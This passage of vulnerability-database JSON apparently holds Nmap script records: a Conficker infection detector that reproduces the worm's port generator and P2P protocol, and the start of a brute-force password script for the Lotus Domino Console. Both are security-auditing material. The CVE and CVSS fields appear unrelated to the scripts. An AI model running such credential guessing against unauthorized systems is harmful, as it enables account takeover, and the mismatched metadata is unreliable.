this will run against a system that has a standard Windows port open (445, 139, 137). The arguments `checkall` and `checkconficker` will both perform checks regardless of which port is open, see the args section for more information. \n\nNote: Ensure your clock is correct (within a week) before using this script! \n\nThe majority of research for this script was done by Symantec Security Response, and some was taken from public sources (most notably the port blacklisting was found by David Fifield). A big thanks goes out to everybody who contributed!\n\n## Script Arguments \n\n#### realip \n\nAn IP address to use in place of the one known by Nmap.\n\n#### checkall \n\nIf set to `1` or `true`, attempt to communicate with every open port.\n\n#### checkconficker \n\nIf set to `1` or `true`, the script will always run on active hosts, it doesn't matter if any open ports were detected.\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n # Run the scripts against host(s) that appear to be Windows\n nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -T4 -vv -p445 <host>\n sudo nmap -sU -sS --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -vv -T4 -p U:137,T:139 <host>\n \n # Run the scripts against all active hosts (recommended)\n nmap -p139,445 -vv --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=checkconficker=1,safe=1 -T4 <host>\n \n # Run scripts against all 65535 ports (slow)\n nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns -p- --script-args=checkall=1,safe=1 -vv -T4 <host>\n \n # Base checks on a different ip address (NATed)\n nmap --script p2p-conficker,smb-os-discovery -p445 --script-args=realip=\\\"192.168.1.65\\\" -vv -T4 <host>\n \n\n## Script Output \n \n \n Clean machine (results printed only if extra verbosity (\"-vv\")is specified):\n Host script results:\n | p2p-conficker: Checking for Conficker.C or higher...\n | Check 1 (port 44329/tcp): CLEAN (Couldn't connect)\n | Check 2 (port 33824/tcp): CLEAN (Couldn't connect)\n | Check 3 (port 31380/udp): CLEAN (Failed to receive data)\n | Check 4 (port 52600/udp): CLEAN (Failed to receive data)\n |_ 0/4 checks: Host is CLEAN or ports are blocked\n \n Infected machine (results always printed):\n Host script results:\n | p2p-conficker: Checking for Conficker.C or higher...\n | Check 1 (port 18707/tcp): INFECTED (Received valid data)\n | Check 2 (port 65273/tcp): INFECTED (Received valid data)\n | Check 3 (port 11722/udp): INFECTED (Received valid data)\n | Check 4 (port 12690/udp): INFECTED (Received valid data)\n |_ 4/4 checks: Host is likely INFECTED\n \n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [os](<>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-04-21T18:30:40", "type": "nmap", "title": "p2p-conficker NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-08-02T04:21:39", "id": "NMAP:P2P-CONFICKER.NSE", "href": "https://nmap.org/nsedoc/scripts/p2p-conficker.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal os = require \"os\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks if a host is infected with Conficker.C or higher, based on\nConficker's peer to peer communication.\n\nWhen Conficker.C or higher infects a system, it opens four ports: two TCP\nand two UDP. The ports are random, but are seeded with the current week and\nthe IP of the infected host. By determining the algorithm, one can check if\nthese four ports are open, and can probe them for more data.\n\nOnce the open ports are found, communication can be initiated using\nConficker's custom peer to peer protocol. If a valid response is received,\nthen a valid Conficker infection has been found.\n\nThis check won't work properly on a multihomed or NATed system because the\nopen ports will be based on a nonpublic IP. The argument\n<code>checkall</code> tells Nmap to attempt communication with every open\nport (much like a version check) and the argument <code>realip</code> tells\nNmap to base its port generation on the given IP address instead of the\nactual IP.\n\nBy default, this will run against a system that has a standard Windows port\nopen (445, 139, 137). The arguments <code>checkall</code> and\n<code>checkconficker</code> will both perform checks regardless of which\nport is open, see the args section for more information.\n\nNote: Ensure your clock is correct (within a week) before using this script!\n\nThe majority of research for this script was done by Symantec Security\nResponse, and some was taken from public sources (most notably the port\nblacklisting was found by David Fifield). A big thanks goes out to everybody\nwho contributed!\n]]\n\n---\n-- @args checkall If set to <code>1</code> or <code>true</code>, attempt\n-- to communicate with every open port.\n-- @args checkconficker If set to <code>1</code> or <code>true</code>, the script will always run on active hosts,\n-- it doesn't matter if any open ports were detected.\n-- @args realip An IP address to use in place of the one known by Nmap.\n--\n-- @usage\n-- # Run the scripts against host(s) that appear to be Windows\n-- nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -T4 -vv -p445 <host>\n-- sudo nmap -sU -sS --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -vv -T4 -p U:137,T:139 <host>\n--\n-- # Run the scripts against all active hosts (recommended)\n-- nmap -p139,445 -vv --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=checkconficker=1,safe=1 -T4 <host>\n--\n-- # Run scripts against all 65535 ports (slow)\n-- nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns -p- --script-args=checkall=1,safe=1 -vv -T4 <host>\n--\n-- # Base checks on a different ip address (NATed)\n-- nmap --script p2p-conficker,smb-os-discovery -p445 --script-args=realip=\\\"192.168.1.65\\\" -vv -T4 <host>\n--\n-- @output\n-- Clean machine (results printed only if extra verbosity (\"-vv\")is specified):\n-- Host script results:\n-- | p2p-conficker: Checking for Conficker.C or higher...\n-- | Check 1 (port 44329/tcp): CLEAN (Couldn't connect)\n-- | Check 2 (port 33824/tcp): CLEAN (Couldn't connect)\n-- | Check 3 (port 31380/udp): CLEAN (Failed to receive data)\n-- | Check 4 (port 52600/udp): CLEAN (Failed to receive data)\n-- |_ 0/4 checks: Host is CLEAN or ports are blocked\n--\n-- Infected machine (results always printed):\n-- Host script results:\n-- | p2p-conficker: Checking for Conficker.C or higher...\n-- | Check 1 (port 18707/tcp): INFECTED (Received valid data)\n-- | Check 2 (port 65273/tcp): INFECTED (Received valid data)\n-- | Check 3 (port 11722/udp): INFECTED (Received valid data)\n-- | Check 4 (port 12690/udp): INFECTED (Received valid data)\n-- |_ 4/4 checks: Host is likely INFECTED\n--\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes (with research from Symantec Security Response)\"\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\",\"safe\"}\n\n\n-- Max packet size\nlocal MAX_PACKET = 0x2000\n\n-- Flags\nlocal mode_flags =\n{\n FLAG_MODE = 1 << 0,\n FLAG_LOCAL_ACK = 1 << 1,\n FLAG_IS_TCP = 1 << 2,\n FLAG_IP_INCLUDED = 1 << 3,\n FLAG_UNKNOWN0_INCLUDED = 1 << 4,\n FLAG_UNKNOWN1_INCLUDED = 1 << 5,\n FLAG_DATA_INCLUDED = 1 << 6,\n FLAG_SYSINFO_INCLUDED = 1 << 7,\n FLAG_ENCODED = 1 << 15,\n}\n\n---For a hostrule, simply use the 'smb' ports as an indicator, unless the user overrides it\nhostrule = function(host)\n if ( nmap.address_family() ~= 'inet' ) then\n return false\n end\n if(smb.get_port(host) ~= nil) then\n return true\n elseif(nmap.registry.args.checkall == \"true\" or nmap.registry.args.checkall == \"1\") then\n return true\n elseif(nmap.registry.args.checkconficker == \"true\" or nmap.registry.args.checkconficker == \"1\") then\n return true\n end\n\n return false\nend\n\n-- Multiply two 32-bit integers and return a 64-bit product. The first return\n-- value is the low-order 32 bits of the product and the second return value is\n-- the high-order 32 bits.\n--\n--@param u First number (0 <= u <= 0xFFFFFFFF)\n--@param v Second number (0 <= v <= 0xFFFFFFFF)\n--@return 64-bit product of u*v, as a pair of 32-bit integers.\nlocal function mul64(u, v)\n -- This is based on formula (2) from section 4.3.3 of The Art of\n -- Computer Programming. We split u and v into upper and lower 16-bit\n -- chunks, such that\n -- u = 2**16 u1 + u0 and v = 2**16 v1 + v0\n -- Then\n -- u v = (2**16 u1 + u0) * (2**16 v1 + v0)\n -- = 2**32 u1 v1 + 2**16 (u0 v1 + u1 v0) + u0 v0\n assert(0 <= u and u <= 0xFFFFFFFF)\n assert(0 <= v and v <= 0xFFFFFFFF)\n local u0, u1 = (u & 0xFFFF), (u >> 16)\n local v0, v1 = (v & 0xFFFF), (v >> 16)\n -- t uses at most 49 bits, which is within the range of exact integer\n -- precision of a Lua number.\n local t = u0 * v0 + (u0 * v1 + u1 * v0) * 65536\n return (t & 0xFFFFFFFF), u1 * v1 + (t >> 32)\nend\n\n---Rotates the 64-bit integer defined by h:l left by one bit.\n--\n--@param h The high-order 32 bits\n--@param l The low-order 32 bits\n--@return 64-bit rotated integer, as a pair of 32-bit integers.\nlocal function rot64(h, l)\n local i\n\n assert(0 <= h and h <= 0xFFFFFFFF)\n assert(0 <= l and l <= 0xFFFFFFFF)\n\n local tmp = h & 0x80000000\n h = h << 1\n h = h | (l >> 31)\n l = l << 1\n if tmp ~= 0 then\n l = l | 1\n end\n\n h = h & 0xFFFFFFFF\n l = l & 0xFFFFFFFF\n\n return h, l\nend\n\n\n---Check if a port is Blacklisted. Thanks to David Fifield for determining the purpose of the \"magic\"\n-- array:\n-- <http://www.bamsoftware.com/wiki/Nmap/PortSetGraphics#conficker>\n--\n-- Basically, each bit in the blacklist array represents a group of 32 ports. If that bit is on, those ports\n-- are blacklisted and will never come up.\n--\n--@param port The port to check\n--@return true if the port is blacklisted, false otherwise\nlocal function is_blacklisted_port(port)\n local r, l\n\n local blacklist = { 0xFFFFFFFF, 0xFFFFFFFF, 0xF0F6BFBB, 0xBB5A5FF3,\n 0xF3977011, 0xEB67BFBF, 0x5F9BFAC8, 0x34D88091, 0x1E2282DF, 0x573402C4,\n 0xC0000084, 0x03000209, 0x01600002, 0x00005000, 0x801000C0, 0x00500040,\n 0x000000A1, 0x01000000, 0x01000000, 0x00022A20, 0x00000080, 0x04000000,\n 0x40020000, 0x88000000, 0x00000180, 0x00081000, 0x08801900, 0x00800B81,\n 0x00000280, 0x080002C0, 0x00A80000, 0x00008000, 0x00100040, 0x00100000,\n 0x00000000, 0x00000000, 0x10000008, 0x00000000, 0x00000000, 0x00000004,\n 0x00000002, 0x00000000, 0x00040000, 0x00000000, 0x00000000, 0x00000000,\n 0x00410000, 0x82000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000,\n 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,\n 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x80000000,\n }\n\n r = port >> 5\n l = 1 << (r & 0x1f)\n r = r >> 5\n\n return blacklist[r + 1] & l ~= 0\nend\n\n---Generates the four random ports that Conficker uses, based on the current time and the IP address.\n--\n--@param ip The IP address as a 32-bit little endian integer\n--@param seed The seed, based on the time (<code>floor((time - 345600) / 604800)</code>)\n--@return An array of four ports; the first and third are TCP, and the second and fourth are UDP.\nlocal function prng_generate_ports(ip, seed)\n local ports = {0, 0, 0, 0}\n local v1, v2\n local port1, port2, shift1, shift2\n local i\n local magic = 0x015A4E35\n\n stdnse.debug1(\"Conficker: Generating ports based on ip (0x%08x) and seed (%d)\", ip, seed)\n\n v1 = -(ip + 1)\n repeat\n -- Loop 10 times to generate the first pair of ports\n for i = 0, 9, 1 do\n v1, v2 = mul64(v1 & 0xFFFFFFFF, magic & 0xFFFFFFFF)\n\n -- Add 1 to v1, handling overflows\n if(v1 ~= 0xFFFFFFFF) then\n v1 = v1 + 1\n else\n v1 = 0\n v2 = v2 + 1\n end\n\n v2 = v2 >> i\n\n ports[(i % 2) + 1] = (v2 & 0xFFFF) ~ ports[(i % 2) + 1]\n end\n until(is_blacklisted_port(ports[1]) == false and is_blacklisted_port(ports[2]) == false and ports[1] ~= ports[2])\n\n -- Update the accumulator with the seed\n v1 = v1 ~ seed\n\n -- Loop 10 more times to generate the second pair of ports\n repeat\n for i = 0, 9, 1 do\n v1, v2 = mul64(v1 & 0xFFFFFFFF, magic & 0xFFFFFFFF)\n\n -- Add 1 to v1, handling overflows\n if(v1 ~= 0xFFFFFFFF) then\n v1 = v1 + 1\n else\n v1 = 0\n v2 = v2 + 1\n end\n\n v2 = v2 >> i\n\n ports[(i % 2) + 3] = (v2 & 0xFFFF) ~ ports[(i % 2) + 3]\n end\n until(is_blacklisted_port(ports[3]) == false and is_blacklisted_port(ports[4]) == false and ports[3] ~= ports[4])\n\n return {ports[1], ports[2], ports[3], ports[4]}\nend\n\n---Calculate a checksum for the data. This checksum is appended to every Conficker packet before the random noise.\n-- The checksum includes the key and data, but not the noise and optional length.\n--\n--@param data The data to create a checksum for.\n--@return An integer representing the checksum.\nlocal function p2p_checksum(data)\n local hash = #data\n\n stdnse.debug2(\"Conficker: Calculating checksum for %d-byte buffer\", #data)\n\n data:gsub(\".\", function(i)\n local h = hash ~ string.byte(i)\n -- Incorporate the current character into the checksum\n hash = (h + h) | (h >> 31)\n hash = hash & 0xFFFFFFFF\n end\n )\n\n return hash\nend\n\n---Encrypt/decrypt the buffer with a simple xor-based symmetric encryption. It uses a 64-bit key, represented\n-- by key1:key2, that is transmitted in plain text. Since sniffed packets can be decrypted, this is a\n-- simple obfuscation technique.\n--\n--@param packet The packet to encrypt (before the key and optional length are prepended).\n--@param key1 The low-order 32 bits in the key.\n--@param key2 The high-order 32 bits in the key.\n--@return The encrypted (or decrypted) data.\nlocal function p2p_cipher(packet, key1, key2)\n local i\n local buf = {}\n\n for i = 1, #packet, 1 do\n -- Do a 64-bit rotate on key1:key2\n key2, key1 = rot64(key2, key1)\n\n -- Generate the key (the right-most byte)\n local k = key1 & 0x0FF\n\n -- Xor the current character and add it to the encrypted buffer\n buf[i] = string.char(string.byte(packet, i) ~ k)\n\n -- Update the key with 'k'\n key1 = key1 + k\n if(key1 > 0xFFFFFFFF) then\n -- Handle overflows\n key2 = key2 + (key1 >> 32)\n key2 = key2 & 0xFFFFFFFF\n key1 = key1 & 0xFFFFFFFF\n end\n end\n\n return table.concat(buf)\nend\n\n---Decrypt the packet, verify it, and parse it. This function will fail with an error if the packet can't be\n-- parsed properly (likely means the port is being used for something else), but will return successfully\n-- without checking the packet's checksum (although it does calculate the checksum). It's up to the calling\n-- function to decide if it cares about the checksum.\n--\n--@param packet The packet, without the optional length (if it's TCP).\n--@return (status, result) If status is true, result is a table (including 'hash' and 'real_hash'). If status\n-- is false, result is a string that indicates why the parse failed.\nfunction p2p_parse(packet)\n local pos = 1\n local data = {}\n\n -- Get the key\n if #packet < 8 then\n return false, \"Packet was too short [1]\"\n end\n data['key1'], data['key2'], pos = string.unpack(\"<I4 I4\", packet, pos)\n\n -- Decrypt the second half of the packet using the key\n packet = string.sub(packet, 1, pos - 1) .. p2p_cipher(string.sub(packet, pos), data['key1'], data['key2'])\n\n -- Parse the flags\n if #packet - pos + 1 < 2 then\n return false, \"Packet was too short [2]\"\n end\n data['flags'], pos = string.unpack(\"<I2\", packet, pos)\n\n -- Get the IP, if it's present\n if(data['flags'] & mode_flags.FLAG_IP_INCLUDED) ~= 0 then\n if #packet - pos + 1 < 6 then\n return false, \"Packet was too short [3]\"\n end\n data['ip'], data['port'], pos = string.unpack(\"<I4 I2\", packet, pos)\n end\n\n -- Read the first unknown value, if present\n if(data['flags'] & mode_flags.FLAG_UNKNOWN0_INCLUDED) ~= 0 then\n if #packet - pos + 1 < 4 then\n return false, \"Packet was too short [3]\"\n end\n data['unknown0'], pos = string.unpack(\"<I4\", packet, pos)\n end\n\n -- Read the second unknown value, if present\n if(data['flags'] & mode_flags.FLAG_UNKNOWN1_INCLUDED) ~= 0 then\n if #packet - pos + 1 < 4 then\n return false, \"Packet was too short [4]\"\n end\n data['unknown1'], pos = string.unpack(\"<I4\", packet, pos)\n end\n\n -- Read the data, if present\n if(data['flags'] & mode_flags.FLAG_DATA_INCLUDED) ~= 0 then\n if #packet - pos + 1 < 3 then\n return false, \"Packet was too short [5]\"\n end\n data['data_flags'], data['data_length'], pos = string.unpack(\"<B I2\", packet, pos)\n if #packet - pos + 1 < data.data_length then\n return false, \"Packet was too short [6]\"\n end\n data['data'], pos = string.unpack((\"c%d\"):format(data['data_length']), packet, pos)\n end\n\n -- Read the sysinfo, if present\n if(data['flags'] & mode_flags.FLAG_SYSINFO_INCLUDED) ~= 0 then\n local sysinfo_format = \"<I2 BBI2 BB I2 I4 I2I2I4I2I2\"\n if #packet - pos + 1 < string.packsize(sysinfo_format) then\n return false, \"Packet was too short [7]\"\n end\n\n data['sysinfo_systemtestflags'],\n data['sysinfo_os_major'],\n data['sysinfo_os_minor'],\n data['sysinfo_os_build'],\n data['sysinfo_os_servicepack_major'],\n data['sysinfo_os_servicepack_minor'],\n data['sysinfo_ntdll_translation_file_information'],\n data['sysinfo_prng_sample'],\n data['sysinfo_unknown0'],\n data['sysinfo_unknown1'],\n data['sysinfo_unknown2'],\n data['sysinfo_unknown3'],\n data['sysinfo_unknown4'], pos = string.unpack(sysinfo_format, packet, pos)\n end\n\n -- Pull out the data that's used in the hash\n data['hash_data'] = string.sub(packet, 1, pos - 1)\n\n -- Read the hash\n if #packet - pos + 1 < 4 then\n return false, \"Packet was too short [8]\"\n end\n data['hash'], pos = string.unpack(\"<I4\", packet, pos)\n\n -- Record the noise\n data['noise'] = string.sub(packet, pos)\n\n -- Generate the actual hash (we're going to ignore it for now, but it can be checked higher up)\n data['real_hash'] = p2p_checksum(data['hash_data'])\n\n return true, data\nend\n\n---Create a peer to peer packet for the given protocol.\n--\n--@param protocol The protocol (either 'tcp' or 'udp' -- tcp packets have a length in front, and an extra\n-- flag)\n--@param do_encryption (optional) If set to false, packets aren't encrypted (the key '0' is used). Useful\n-- for testing. Default: true.\nlocal function p2p_create_packet(protocol, do_encryption)\n assert(protocol == \"tcp\" or protocol == \"udp\")\n\n local key1 = math.random(1, 0x7FFFFFFF)\n local key2 = math.random(1, 0x7FFFFFFF)\n\n -- A key of 0 disables the encryption\n if(do_encryption == false) then\n key1 = 0\n key2 = 0\n end\n\n local flags = 0\n\n -- Set a couple flags that we need (we don't send any optional data)\n flags = flags | mode_flags.FLAG_MODE\n flags = flags | mode_flags.FLAG_ENCODED\n -- flags = flags | mode_flags.FLAG_LOCAL_ACK)\n -- Set the special TCP flag\n if(protocol == \"tcp\") then\n flags = flags | mode_flags.FLAG_IS_TCP\n end\n\n -- Add the key and flags that are always present (and skip over the boring stuff)\n local packet = string.pack(\"<I4 I4 I2\", key1, key2, flags)\n\n -- Generate the checksum for the packet\n local hash = p2p_checksum(packet)\n packet = packet .. string.pack(\"<I4\", hash)\n\n -- Encrypt the full packet, except for the key and optional length\n packet = string.sub(packet, 1, 8) .. p2p_cipher(string.sub(packet, 9), key1, key2)\n\n -- Add the length in front if it's TCP\n if(protocol == \"tcp\") then\n packet = string.pack(\"<s2\", packet)\n end\n\n return true, packet\nend\n\n---Checks if conficker is present on the given port/protocol. The ports Conficker uses are fairly standard, so\n-- those should generally be used for this check. This can also be sent to any open port on the system.\n--\n--@param ip The ip address of the system to check\n--@param port The port to check (can be taken from <code>prng_generate_ports</code>, or from unidentified ports)\n--@return (status, reason, data) Status indicates whether or not Conficker is suspected to be present (<code>true</code) =\n-- Conficker, <code>false</code> = no Conficker). If status is true, data is the table of information returned by\n-- Conficker.\nlocal function conficker_check(ip, port, protocol)\n local status, packet\n local socket\n local response\n\n status, packet = p2p_create_packet(protocol)\n if(status == false) then\n return false, packet\n end\n\n -- Try to connect to the first socket\n socket = nmap.new_socket()\n socket:set_timeout(5000)\n status, response = socket:connect(ip, port, protocol)\n if(status == false) then\n return false, \"Couldn't establish connection (\" .. response .. \")\"\n end\n\n -- Send the packet\n socket:send(packet)\n\n -- Read a response (2 bytes minimum, because that's the TCP length)\n status, response = socket:receive_bytes(2)\n if(status == false) then\n return false, \"Couldn't receive bytes: \" .. response\n elseif(response == \"ERROR\") then\n return false, \"Failed to receive data\"\n elseif(response == \"TIMEOUT\") then\n return false, \"Timeout\"\n elseif(response == \"EOF\") then\n return false, \"Couldn't connect\"\n elseif #response < 2 then\n return false, \"Data too short\"\n end\n\n -- If it's TCP, get the length and make sure we have the full packet\n if(protocol == \"tcp\") then\n local length = string.unpack(\"<I2\", response)\n\n -- Only try for 2 timeouts to get the whole packet\n local tries = 2\n while length > (#response - 2) and tries > 0 do\n tries = tries - 1\n\n local status, response2 = socket:receive_bytes(length - (#response - 2))\n if(status == false) then\n return false, \"Couldn't receive bytes: \" .. response2\n elseif(response2 == \"ERROR\") then\n return false, \"Failed to receive data\"\n elseif(response2 == \"TIMEOUT\") then\n return false, \"Timeout\"\n elseif(response2 == \"EOF\") then\n return false, \"Couldn't connect\"\n end\n\n response = response .. response2\n end\n\n -- Remove the 'length' bytes\n response = string.sub(response, 3)\n end\n\n -- Close the socket\n socket:close()\n\n local status, result = p2p_parse(response)\n\n if(status == false) then\n return false, \"Data received, but wasn't Conficker data: \" .. result\n end\n\n if(result['hash'] ~= result['real_hash']) then\n return false, \"Data received, but checksum was invalid (possibly INFECTED)\"\n end\n\n return true, \"Received valid data\", result\nend\n\naction = function(host)\n local tcp_ports = {}\n local udp_ports = {}\n local response = {}\n local i\n local port, protocol\n local count = 0\n local checks = 0\n\n -- Generate a complete list of valid ports\n if(nmap.registry.args.checkall == \"true\" or nmap.registry.args.checkall == \"1\") then\n for i = 1, 65535, 1 do\n if(not(is_blacklisted_port(i))) then\n local tcp = nmap.get_port_state(host, {number=i, protocol=\"tcp\"})\n if(tcp ~= nil and tcp.state == \"open\") then\n tcp_ports[i] = true\n end\n\n local udp = nmap.get_port_state(host, {number=i, protocol=\"udp\"})\n if(udp ~= nil and (udp.state == \"open\" or udp.state == \"open|filtered\")) then\n udp_ports[i] = true\n end\n end\n end\n end\n\n\n -- Generate ports based on the ip and time\n local seed = math.floor((os.time() - 345600) / 604800)\n local ip = host.ip\n\n -- Use the provided IP, if it exists\n if(nmap.registry.args.realip ~= nil) then\n ip = nmap.registry.args.realip\n end\n\n -- Reverse the IP's endianness\n ip = ipOps.todword(ip)\n ip = string.pack(\">I4\", ip)\n ip = string.unpack(\"<I4\", ip)\n\n -- Generate the ports\n local generated_ports = prng_generate_ports(ip, seed)\n tcp_ports[generated_ports[1]] = true\n tcp_ports[generated_ports[3]] = true\n udp_ports[generated_ports[2]] = true\n udp_ports[generated_ports[4]] = true\n\n table.insert(response, \"Checking for Conficker.C or higher...\")\n\n -- Check the TCP ports\n for port in pairs(tcp_ports) do\n local status, reason\n\n status, reason = conficker_check(host.ip, port, \"tcp\")\n checks = checks + 1\n\n if(status == true) then\n table.insert(response, string.format(\"Check %d (port %d/%s): INFECTED (%s)\", checks, port, \"tcp\", reason))\n count = count + 1\n else\n table.insert(response, string.format(\"Check %d (port %d/%s): CLEAN (%s)\", checks, port, \"tcp\", reason))\n end\n end\n\n -- Check the UDP ports\n for port in pairs(udp_ports) do\n local status, reason\n\n status, reason = conficker_check(host.ip, port, \"udp\")\n checks = checks + 1\n\n if(status == true) then\n table.insert(response, string.format(\"Check %d (port %d/%s): INFECTED (%s)\", checks, port, \"udp\", reason))\n count = count + 1\n else\n table.insert(response, string.format(\"Check %d (port %d/%s): CLEAN (%s)\", checks, port, \"udp\", reason))\n end\n end\n\n -- Check how many INFECTED hits we got\n if(count == 0) then\n if (nmap.verbosity() > 1) then\n table.insert(response, string.format(\"%d/%d checks are positive: Host is CLEAN or ports are blocked\", count, checks))\n else\n response = ''\n end\n else\n table.insert(response, string.format(\"%d/%d checks are positive: Host is likely INFECTED\", count, checks))\n end\n\n return stdnse.format_output(true, response)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:39", "description": "Performs brute force password auditing against the Lotus Domino Console.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script domcon-brute -p 2050 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2050/tcp open unknown syn-ack\n | domcon-brute:\n | Accounts\n |_ patrik karlsson:secret => Login correct\n \n Summary\n -------\n x The Driver class contains the driver implementation used by the brute\n library\n \n \n Version 0.1\n Created 07/12/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T23:02:58", "type": "nmap", "title": "domcon-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DOMCON-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/domcon-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms brute force password auditing against the Lotus Domino Console.\n]]\n\n---\n-- @usage\n-- nmap --script domcon-brute -p 2050 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2050/tcp open unknown syn-ack\n-- | domcon-brute:\n-- | Accounts\n-- |_ patrik karlsson:secret => Login correct\n--\n-- Summary\n-- -------\n-- x The Driver class contains the driver implementation used by the brute\n-- library\n--\n--\n-- Version 0.1\n-- Created 07/12/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\n\nportrule = shortport.port_or_service(2050, \"\", \"tcp\", \"open\")\n\nlocal not_admins = {}\n\nSocketPool = {\n\n new = function(self, max_sockets)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.max_sockets = max_sockets\n o.pool = {}\n return o\n end,\n\n getSocket = function(self, host, port)\n while(true) do\n for i=1, #self.pool do\n if ( not( self.pool[i].inuse ) ) then\n self.pool[i].inuse = true\n return self.pool[i].socket\n end\n end\n if ( #self.pool < self.max_sockets ) then\n local socket = nmap.new_socket()\n local status = socket:connect( host, port )\n\n if ( status ) then\n socket:reconnect_ssl()\n end\n\n if ( status and socket ) then\n table.insert( self.pool, {['socket'] = socket, ['inuse'] = false})\n end\n end\n stdnse.sleep(1)\n end\n end,\n\n releaseSocket = function( self, socket )\n for i=1, #self.pool do\n if( socket == self.pool[i].socket ) then\n self.pool[i].inuse = false\n break\n end\n end\n end,\n\n shutdown = function( self )\n for i=1, #self.pool do\n self.pool[i].socket:close()\n end\n end,\n\n}\n\nDriver =\n{\n\n new = function(self, host, port, options)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.sockpool = options\n return o\n end,\n\n connect = function( self )\n self.socket = self.sockpool:getSocket( self.host, self.port )\n\n if ( self.socket ) then\n return true\n else\n return false\n end\n end,\n\n --- Attempts to login to the Lotus Domino Console\n --\n -- @param username string containing 